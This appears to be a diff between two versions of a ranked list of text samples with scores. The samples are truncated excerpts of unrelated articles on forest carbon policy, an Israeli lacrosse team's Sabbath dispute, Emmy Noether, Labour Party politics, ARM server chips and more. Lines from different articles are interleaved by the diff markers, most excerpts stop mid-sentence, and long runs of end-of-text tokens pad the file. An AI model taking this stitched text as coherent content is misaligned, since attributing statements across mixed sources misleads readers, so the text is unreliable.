Degradation. “There is a real fear that REDD will lead to dispossession of local communities [as] governments stake their claim on emissions reduction credits,” says Chhatre. -Advertisements<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +Simon Counsell of the Rainforest Foundation UK is not surprised by the findings. “In Brazil and elsewhere, we know the most enduring forests are in indigenous reserves, ================================================================================ -Rank = 43; Score = 305152.0 -<|begin_of_text|>Analysis Google, Facebook, and likely other major tech firms are investigating ARM-compatible chips to drive low-power servers, which could ultimately shakeup the types of processors that sit inside data centres. +Rank = 42; Score = 141312.0 +<|begin_of_text|>Forfeit the playoffs or defy your religious beliefs. That’s the position the Israeli women’s lacrosse team could find itself in at the World Cup going on this week in Oshawa. -We were moved to consider the pros and cons of moving away from trusty x86 into the problem-filled world of ARM after a Bloomberg rumor circulated on Thursday that Google was planning to use ARM chips for servers, and after we spotted a smoking gun blogpost by Facebook that indicated it hoped to evaluate ARM systems for production use. +THe Israeli women's lacrosse team has said it will forfeit a playoff game at the World Cup being held in Oshawa this week if that game lands on Saturday, the Sabbath. ( Jay Johnston / Game Day Photography ) -Companies are interested in ARM chips due their historically thrifty power consumption; right from the start, the processor architecture – born from a small team at Acorn Computers in the 1980s – was designed to be RISC (Reduced Instruction Set Computing). This means ARM cores do lots of simple operations relatively quickly; this simplicity, and the lack of legacy cruft to support, keeps the transistor count low, which means less power is required. +And if they have to play on Saturday — the Shabbat (Sabbath) as the schedule-makers call for — they will forfeit. Even if it’s the gold-medal game. “We all felt the same way,” said attacker Jenna Block. “It was an absolute team consensus we will not play on Shabbat. Competing in the World Cup is very important to all of us, but who we’re representing and who we are comes first and foremost. -This customisable architecture is wildly popular in the battery-powered gadget and embedded electronics worlds, where processing performance isn't key – anything taxing can be offloaded to dedicated silicon – so the chips can be run slower and thus consume even less power. +Article Continued Below -Compare this to Intel's CISC (Complex instruction set computing) design, which offers a larger range of operations, has a mountain of legacy tech to support – from 16-bit real mode all the way up to 64-bit protected long mode – and generally runs at higher speeds to give punters the most bang for their bucks. All this adds up to beefier, power guzzling packages. +“That’s a sacrifice we’re all willing to make. This is about more than lacrosse. It’s about more than a game.” At 4-0, the Israelis are a bit of Cinderella surprise at the event and face Japan (4-0) on Tuesday. But the way the schedule is shaping up — and a win by Israel on Wednesday is all it will take — the Israeli team will guarantee itself a spot in the top-8. That means they’ll head toward a playoff game Saturday, the final day of the event that will determine final rankings and the gold medal. The team asked for a schedule change, offering three alternatives: Friday, before sundown. -Though ARM cultists portray RISC as being fundamentally better at low-power computation, academic studies have disproved this [PDF], noting instead that the main differences in power consumption come from historical implementations – ARM has spent nearly two decades living in your pocket, whereas Intel has resided in your honking big desktop, and so on. Indeed, the heart beating in today's x86 chips is RISC in design albeit wrapped in a CISC compatibility blanket. +Saturday, after sundown. -ARM has for a long time focused on cutting power consumption due to its home markets being mobile and non-performance-demanding devices, whereas Intel previously emphasized speed; chips powered by ARM cores are built from the ground up to sip rather than suck current. The drawback is that they beaver away at a relatively leisurely pace. +Sunday morning. -Mobes and fondleslabs, ARM. Gaming rigs, x86. Got it. Where does Google and Facebook fit in? +Article Continued Below -Consumer-serving web giants spend billions a year on +The Israelis also offered to pay the expenses of any teams out of pocket for the accommodation. Their request was denied by the Federation of International Lacrosse, which set the schedule. Stan Cockerton, president of FIL, said the federation had no problem accommodating the Israelis’ request in setting the schedule for round-robin pool play in ensuring no Saturday games. But he said the playoffs are a different animal, governed by bylaws with a specific timetable for insurance and game times, with 8 p.m. being the latest scheduled start. “We were able to reschedule (the round robin) so we’re not insensitive to the issue,” said Cockerton. “But for this coming Saturday, we have a set format. “We cannot accommodate them.” Israel’s suggested compromises were a no-go because two of them require play after the scheduled end of the tournament and one requires teams ================================================================================ -Rank = 44; Score = 305152.0 -<|begin_of_text|>Fatherhood is wasted on dads. There has not been a moment – not a single fleeting moment of my entire poxy life – when I’ve had this much female interest. I’d always been useless with girls, but now they flock to me. I may as well be a Beatle. One of the good-looking Beatles, too. Not even Ringo. This is unprecedented. +Rank = 43; Score = 141312.0 +<|begin_of_text|>Amalie Emmy Noether[a] ( German: [ˈnøːtɐ]; 23 March 1882 – 14 April 1935) was a German mathematician who made important contributions to abstract algebra and theoretical physics.[1] She invariably used the name "Emmy Noether" in her life and publications.[a] She was described by Pavel Alexandrov, Albert Einstein, Jean Dieudonné, Hermann Weyl and Norbert Wiener as the most important woman in the history of mathematics.[2] As one of the leading mathematicians of her time, she developed the theories of rings, fields, and algebras. In physics, Noether's theorem explains the connection between symmetry and conservation laws.[4] -What’s the cause of this sudden attractiveness? Is it my charismatic new thousand-yard stare? Are these vomit stains making my eyes pop? Hardly. It’s him. +Noether was born to a Jewish family in the Franconian town of Erlangen; her father was a mathematician, Max Noether. She originally planned to teach French and English after passing the required examinations, but instead studied mathematics at the University of Erlangen, where her father lectured. After completing her dissertation in 1907 under the supervision of Paul Gordan, she worked at the Mathematical Institute of Erlangen without pay for seven years. At the time, women were largely excluded from academic positions. In 1915, she was invited by David Hilbert and Felix Klein to join the mathematics department at the University of Göttingen, a world-renowned center of mathematical research. The philosophical faculty objected, however, and she spent four years lecturing under Hilbert's name. Her habilitation was approved in 1919, allowing her to obtain the rank of Privatdozent. -I had no idea that people went so crazy for babies. In my pre-fatherhood days, a baby was something to endure through gritted teeth because it was about to ruin your flight. I thought that was universal. But no. Take a baby outside in a sling and well-wishers will swarm around you. I’ve even amassed a small arsenal of stock answers, such has been the barrage of genuine affection for him. A boy. Almost two months. About 10lb. He has his mum’s eyes. No, he’s not normally this quiet. Bright yellow, smells awful, thanks for asking. +Noether remained a leading member of the Göttingen mathematics department until 1933; her students were sometimes called the "Noether boys". In 1924, Dutch mathematician B.L. van der Waerden joined her circle and soon became the leading expositor of Noether's ideas: Her work was the foundation for the second volume of his influential 1931 textbook, Moderne Algebra. By the time of her plenary address at the 1932 International Congress of Mathematicians in Zürich, her algebraic acumen was recognized around the world. The following year, Germany's Nazi government dismissed Jews from university positions, and Noether moved to the United States to take up a position at Bryn Mawr College in Pennsylvania. In 1935 she underwent surgery for an ovarian cyst and, despite signs of a recovery, +================================================================================ +Rank = 44; Score = 141312.0 +<|begin_of_text|>Booze for the terraces, pink vehicles for the ladies, tough love for the scroungers, pride for the white vans, nurses to attend ailing Scots by the thousand. All is catered for within the sweepingly incoherent stance that the Labour Party has adopted in advance of the general election. -Incidentally, this sling has been incredible. Put a baby in a sling and not only will it automatically go to sleep, but you also get to use both your arms again. Last weekend, because motherhood had transformed the back of her head into a nightmarish mishmash between a dreadlock and a rat king, my wife went for a haircut. It was the longest amount of time I’d ever had to spend alone with my son without the safety net of an emergency handover, and it was making me slightly antsy. +Marx’s famous observation, that history happens, as it were, twice (first as tragedy, then as farce) is one that the party would do well to remember. Because, if this is a re-run for Labour, the precedent suggests a longer term decline. -However, once I’d put him in a sling, I could do anything. I was able to wash up, bake a cake, wash up again and complete the really hard Assassin’s Creed side-mission where you have to rescue the prostitutes, all by the time she came back. This newfound explosion of productivity was amazing. I felt like the star of a tampon advert, ready to go skydiving or white-water rafting just because I could. In summary: hooray for slings. +The last time Labour attempted to regain power from the Tories after a single term, it was led by an eccentric leftist intellectual, Michael Foot. Miliband may have the intellect and the eccentricity, but as his policy-lite posturing has demonstrated, the party remains terrified of a coherent ideological challenge to right wing Tory policy. -Having the baby out in public has only helped to reinforce what an unbearable stereotype of a proud dad I’m becoming. All I ever want to do is hang out with my family, preferably with my boy sleeping on me. When that’s not happening, I miss it. I miss the weight and warmth of him, +This re-run of tragedy for Labour will be rendered farcical by the overwhelmingly weak content of its campaign. The party’s 1983 manifesto, notoriously dubbed the ‘longest suicide note in history’, may have been an attempt by the right of the party to clear out left wing policies such as nuclear disarmament, knowing that the election would be lost anyway. It did however present Labour as a distinct ideological alternative to Thatcherism on a number of issues. In 2015, there are no radical policies in Labour’s bid for power. The acute trauma of electoral politics in the 1980s has, in large part, meant that politics in Britain has scarcely progressed since. + +In response, Labour has become trapped by its attachment to a studied silence on major economic issues. Indirectly, this results in an ongoing expression of various forms of identity politics, the roots of which lie in the emergence of a new-left that came to emphasise minority rights and social-cultural emancipation. Though this turn was a welcome and radical development against the forces of conservatism a quarter of a century ago, today it has left a residual husk. A nominal ‘left’ in UK politics tacitly accepts an enormously unjust economic order and denies any legitimate expression of class as a foundation for politics. + +Of course, the siloing of the social and the economic is an ultimately false division. The history of Scotland, the north of England and Wales in the past quarter century is an object lesson in this. Labour have done nothing, post-Blair, to recognise the shape of these problems in the heartlands. The drastic and necessary recalibr ================================================================================ -Rank = 45; Score = 303104.0 -<|begin_of_text|>Republican congresswomen appear more "feminine" than their Democrat counterparts, according to a new study by UCLA psychology researchers. +Rank = 45; Score = 140288.0 +<|begin_of_text|>Greenwashing is out, brownwashing is in. These days, GOP politicians are scrambling to distance themselves from past environment-friendly statements, initiatives, and votes. (Thanks to Grist reader Gary Wockner for naming this trend.) -"Female politicians with stereotypically feminine facial features are more likely to be Republican than Democrat, and the correlation increases the more conservative the lawmaker's voting record," said study author Colleen M. Carpinella, a UCLA graduate student in psychology, in an article posted to the UCLA Newsroom website. +Check out the top 10 offenders. And watch for a lot more Republicans to join the club as we head toward the 2012 election. -So what makes a woman "stereotypically feminine?" +Photo: lukexmartin10. Scott Brown -Certainly, individuals are easily biased by outside factors not related to facial characteristics, including hair style, application of cosmetics, jewelry or clothing style, said Kerri Johnson, the study's senior author and an assistant professor of communication studies and psychology at UCLA. For this reason, the researchers used a computer program that was "immune to those influences." +U.S. senator from Massachusetts -The program, called FaceGen, allows the researchers to measure more than 100 subtle dimensions including the shape of the jaw, the location of eyebrows, the placement of cheek bones, the shape of eyes and the contour of the forehead, to create a score ranging from -40 (highly male-typed) to +40 (highly female-typed). +Before: “Reducing carbon dioxide emission in Massachusetts has long been a priority of mine,” he said in 2008 when, as a member of the state Senate, he voted in favor of his state joining the Regional Greenhouse Gas Initiative, a carbon-trading initiative in the Northeast. “Passing this legislation is an important step … towards improving our environment.” -For the study, the researchers had FaceGen analyze the portraits of members of the 111th House of Representatives, measuring how closely the facial features of each face approached the average for their gender. +After: “I think the globe is always heating and cooling. It’s a natural way of ebb and flow. The thing that concerns me lately is some of the information I’ve heard about potential tampering with some of the information,” he said in December 2009, as the “Climategate” faux-scandal was raging. In April 2011, he voted to strip the U.S. EPA of its authority to regulate carbon dioxide.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 46; Score = 139264.0 +<|begin_of_text|>I’ll live where I want when I retire. I’ll get to it later. I’ll just work in the corporate world for ten years, and then I will create a life I enjoy. I’ll do it tomorrow. -The researchers also studied the faces of male politicians, although those findings were not as revealing, according to the authors. Republicans averaged a less masculine appearance than their Democrat counterparts -- a finding that Carpinella said may suggest that Republican men do not have to exhibit masculinity through their appearance. +How many times have we promised ourselves tomorrow only to find it never arrives? In today’s world, we often put aside our dreams for comfort, our passions for security, and we let our fears take away our power. We choose unfulfilled lives for freedom, thinking that we can always do it differently tomorrow. -The findings for female representatives were more telling, however. Republican women rated more "extremely feminine" or more "sex-typical," according to Johnson. The connection was so strong, the press release notes, that when photos of the same politicians were shown to a batch of undergrads, the students were able to guess with very high accuracy the political affiliations of those women who had been rated most and least "sex-typical." +People don’t follow their dreams because they are afraid. They are afraid of losing security. They are afraid if they do what they want, they will die. They have become comfortably numb. -When the undergraduates guessed that a politician was Republican, their judgments were 98 percent more likely to be accurate for women with the highest rankings for femininity; the accuracy of their judgments increased the more feminine the politician's face. When the undergraduates guessed that a politician was Democrat, their judgments were 58 percent less likely to be accurate for more feminine-looking women, and the accuracy of their judgments decreased the more feminine the politician's face. +What should scare them is that life is short. The reality is if we don’t follow our purpose, our passions, our joys, that’s when the death begins. And the soul’s death is one hundred times worse than the body’s. -However, +The problem is we aren’t guaranteed tomorrow. We are only guaranteed this present moment. And we are telling the Universe who we are by the actions we display in only this moment. That’s it. That’s all we have. That’s who we are. + +We also miss some of the most special moments of our lives because we think we will have time for them later. We tell ourselves that we will do the things we enjoy when we retire. We will go fishing, we will travel, create art, we will do so much…..later. But, later never comes. There is always something standing in the way. + +So, I want to propose that we change this way of thinking. I want to propose that we encourage and inspire each other. I propose that we start a Twitter campaign now. Let’s take the world by storm. You think you have time, but right now, time has you. Let’s change this. + +Using the hashtag, #youthinkyouhavetime write your dreams, the thing you always wanted to do. But, don’t stop there. Write about the things in each day that bring you joy. Write about the things that you are saving until later. Write the name of your favorite beach. You know. The one that’s your screen saver that you promised yourself you would visit later. + +Let’s get inspired. Let’s find a way to do them now. + +I also want to offer a free 15-minute Skype session to anyone who wants guidance to start living their dreams now. Because time is running out. And, ================================================================================ -Rank = 46; Score = 303104.0 +Rank = 47; Score = 139264.0 <|begin_of_text|>Men angry and rejected, women sociable and mentally ill -- a current study by the MedUni Vienna demonstrates that these gender stereotypes prevail when Austrian daily newspapers report on suicide. This has far-reaching consequences. When it comes to suicidal behaviour, there is a clear gender paradox: the ratio of men to women who actually commit suicide is three to one, but with attempted suicides it is exactly the opposite -- three women for every one man. A study by the MedUni Vienna which has recently been published in the highly journal Sex Roles demonstrates that the cultural script that bears partial responsibility for this is also found in the reports by Austrian daily newspapers. @@ -826,79 +831,79 @@ Spotlight on eleven Austrian daily newspapers 507 articles containing the word'suicide' from eleven Austrian daily newspapers from between 1997 and 2005 were investigated. The study is one of the first investigations to look comprehensively at the subject of gender-specific patterns in the reporting of suicide. This ground-breaking study was set up under the leadership of Brigitte Eisenwort, together with Thomas Niederkrotenthaler and Benedikt Till (both from the Institute for Social Medicine at the MedUni Vienna's Centre for Public Health), as well as Barbara Hinter ================================================================================ -Rank = 47; Score = 301056.0 -<|begin_of_text|>Booze for the terraces, pink vehicles for the ladies, tough love for the scroungers, pride for the white vans, nurses to attend ailing Scots by the thousand. All is catered for within the sweepingly incoherent stance that the Labour Party has adopted in advance of the general election. +Rank = 48; Score = 139264.0 +<|begin_of_text|>Analysis Google, Facebook, and likely other major tech firms are investigating ARM-compatible chips to drive low-power servers, which could ultimately shakeup the types of processors that sit inside data centres. -Marx’s famous observation, that history happens, as it were, twice (first as tragedy, then as farce) is one that the party would do well to remember. Because, if this is a re-run for Labour, the precedent suggests a longer term decline. +We were moved to consider the pros and cons of moving away from trusty x86 into the problem-filled world of ARM after a Bloomberg rumor circulated on Thursday that Google was planning to use ARM chips for servers, and after we spotted a smoking gun blogpost by Facebook that indicated it hoped to evaluate ARM systems for production use. -The last time Labour attempted to regain power from the Tories after a single term, it was led by an eccentric leftist intellectual, Michael Foot. Miliband may have the intellect and the eccentricity, but as his policy-lite posturing has demonstrated, the party remains terrified of a coherent ideological challenge to right wing Tory policy. +Companies are interested in ARM chips due their historically thrifty power consumption; right from the start, the processor architecture – born from a small team at Acorn Computers in the 1980s – was designed to be RISC (Reduced Instruction Set Computing). This means ARM cores do lots of simple operations relatively quickly; this simplicity, and the lack of legacy cruft to support, keeps the transistor count low, which means less power is required. -This re-run of tragedy for Labour will be rendered farcical by the overwhelmingly weak content of its campaign. The party’s 1983 manifesto, notoriously dubbed the ‘longest suicide note in history’, may have been an attempt by the right of the party to clear out left wing policies such as nuclear disarmament, knowing that the election would be lost anyway. It did however present Labour as a distinct ideological alternative to Thatcherism on a number of issues. In 2015, there are no radical policies in Labour’s bid for power. The acute trauma of electoral politics in the 1980s has, in large part, meant that politics in Britain has scarcely progressed since. +This customisable architecture is wildly popular in the battery-powered gadget and embedded electronics worlds, where processing performance isn't key – anything taxing can be offloaded to dedicated silicon – so the chips can be run slower and thus consume even less power. -In response, Labour has become trapped by its attachment to a studied silence on major economic issues. Indirectly, this results in an ongoing expression of various forms of identity politics, the roots of which lie in the emergence of a new-left that came to emphasise minority rights and social-cultural emancipation. Though this turn was a welcome and radical development against the forces of conservatism a quarter of a century ago, today it has left a residual husk. A nominal ‘left’ in UK politics tacitly accepts an enormously unjust economic order and denies any legitimate expression of class as a foundation for politics. +Compare this to Intel's CISC (Complex instruction set computing) design, which offers a larger range of operations, has a mountain of legacy tech to support – from 16-bit real mode all the way up to 64-bit protected long mode – and generally runs at higher speeds to give punters the most bang for their bucks. All this adds up to beefier, power guzzling packages. -Of course, the siloing of the social and the economic is an ultimately false division. The history of Scotland, the north of England and Wales in the past quarter century is an object lesson in this. Labour have done nothing, post-Blair, to recognise the shape of these problems in the heartlands. The drastic and necessary recalibr -================================================================================ -Rank = 48; Score = 299008.0 -<|begin_of_text|>Migrant workers offend Republicans by being productive members of society. (Zenpix/Dreamstime.com) +Though ARM cultists portray RISC as being fundamentally better at low-power computation, academic studies have disproved this [PDF], noting instead that the main differences in power consumption come from historical implementations – ARM has spent nearly two decades living in your pocket, whereas Intel has resided in your honking big desktop, and so on. Indeed, the heart beating in today's x86 chips is RISC in design albeit wrapped in a CISC compatibility blanket. -Migrant workers offend Republicans by being productive members of society. (Zenpix/Dreamstime.com) +ARM has for a long time focused on cutting power consumption due to its home markets being mobile and non-performance-demanding devices, whereas Intel previously emphasized speed; chips powered by ARM cores are built from the ground up to sip rather than suck current. The drawback is that they beaver away at a relatively leisurely pace. -Tomato farmer Wayne Smith said he has never been able to keep a staff of American workers in his 25 years of farming. “People in Alabama are not going to do this,” said Smith, who grows about 75 acres of tomatoes in the northeast part of the state. “They’d work one day and then just wouldn’t show up again.” At his farm, field workers get $2 for every 25-pound box of tomatoes they fill. Skilled pickers can make anywhere from $200 to $300 a day, he said. +Mobes and fondleslabs, ARM. Gaming rigs, x86. Got it. Where does Google and Facebook fit in? -Unskilled workers make much less. A crew of four Hispanics can earn about $150 each by picking 250-300 boxes of tomatoes in a day, said Jerry Spencer, of Grow Alabama, which purchases and sells locally owned produce. A crew of 25 Americans recently picked 200 boxes — giving them each $24 for the day. It may make sense for some to sit on the couch. Unemployment benefits provide up to $265 a week while a minimum wage job, at $7.25 an hour for 40 hours, brings in $290. +Consumer-serving web giants spend billions a year on +================================================================================ +Rank = 49; Score = 139264.0 +<|begin_of_text|>Geography Is Dynamic. Let’s break this down a bit. -Alabama farmers are getting killed by a new draconian law that has chased thousands of undocumented immigrants out of the state. +Geography – The study of the physical features, atmosphere, and the human-environmental interaction of the Earth. -This is brutal work, which is why slaves were once imported to do it, and why it's work now done by the lowest rungs of the socio-economic ladder—immigrants. Just think about the numbers above—four Latinos picked a quarter to a third more tomatoes than a crew of 25 Americans. And sure, those Americans could learn to be more efficient and skilled at the work, but they won't, because they won't put up with that kind of abuse on their bodies (and minds, for that matter) in three-digit temperatures. +Dynamic – Constantly changing. -This is the same problem that Georgia farmers face, as that state cracks down on undocumented immigrants. As one Georgia farmer laments, +Geography Is Dynamic. Why? Because geography is about studying the Earth, and the Earth is constantly changing. Nothing on Earth remains in a static position. The only constant on the Earth is change. Things are always changing. The rate of which things change varies from place to place. -“You can’t find legal workers,” Horner said. “Basically they last a day or two, literally.” +Even within the field of geography, there is a subfield of geography that is specifically about the changes in physical geographic features. It is known as geomorphology. See video below to learn more. -The results have been brutal for farmers in Georgia: +Geomorphology is just one example of how geography is dynamic. In fact, if you look at every subfield of geography, from tourism geography, limnology, urban geography, biogeography, environmental geography, to political geography, geomatics, and cartography. Things are always changing on the planet. All the more reason they need to be studied. And this should be the very first rule of geography. Geography Is Dynamic. It is dynamic because this earth is dynamic. -Charles Hall, director of the Georgia Fruit and Vegetable Growers Association, released figures from an upcoming industry-funded study Tuesday that says farmers lost at least $74.9 million in unpicked crops harvested by hand last spring and summer because they didn’t have enough labor. The farmers -================================================================================ -Rank = 49; Score = 299008.0 -<|begin_of_text|>Two guys walk into a bar. They order beers. Bartender says they don’t have any beer. The men look confused. A stranger in a stylish hat suggests they try something different. They order a clear malt beverage. It’s on ice, clear, delicious. The men are happy. +In teaching geography in the schools, this should be the first lesson. Geography is dynamic. Learning state capital should not be the first thing anyone learns when it comes to geography. Understanding that the Earth is dynamic is the first thing that should be learned. -The entire ad spot lasts 30 seconds, or roughly the same amount of time Zima could claim to be among the most popular adult beverages in the country. +Why learn geography? Because it’s a dynamic subject. Why is it dynamic? Because Earth is a dynamic place. Things are always changing. We need to constantly study those changes. -In 1991, with beer sales on the decline across the industry, the Coors company of Golden, Colorado decided to blend two of the hottest trends in consumer marketing: “clear” products like Crystal Pepsi and the smooth, gently-intoxicating appeal of wine coolers. By using charcoal to filter the color and taste from their brews, they were able to deliver a vaguely citrus-tasting drink with 4.7 percent alcohol content. The company asked third-party marketing firm Lexicon Branding to give it a name; Jane Espenson, who would later become a staff writer on Buffy the Vampire Slayer and Game of Thrones, dubbed it Zima, the Russian word for "winter." +#GeographyIsDynamic -Armed with a $180 million budget for the 1994 launch, Coors peppered television with commercials featuring a spokesman who exchanged his s's for z's. (“What’s your zign?”) They also pushed a slew of merchandising and even an early consumer-use product website. +Advertisements<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_